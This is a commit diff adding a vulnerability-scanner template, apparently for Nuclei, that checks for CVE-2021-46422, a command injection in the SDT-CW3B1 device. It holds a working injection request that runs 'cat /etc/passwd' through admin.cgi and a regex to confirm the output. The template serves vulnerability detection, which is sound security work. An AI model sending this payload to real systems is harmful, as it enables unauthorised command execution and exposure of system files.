commit
b240abad90
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2021-46422
|
||||
|
||||
info:
|
||||
name: SDT-CW3B1 1.1.0 - OS command injection
|
||||
author: remote
|
||||
severity: high
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50936
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
|
||||
classification:
|
||||
cve-id: CVE-2021-46422
|
||||
metadata:
|
||||
verified: false
|
||||
tags: cve,cve2021,injection,rce
|
||||
|
||||
variables:
|
||||
cmd: "cat+/etc/passwd"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
Loading…
Reference in New Issue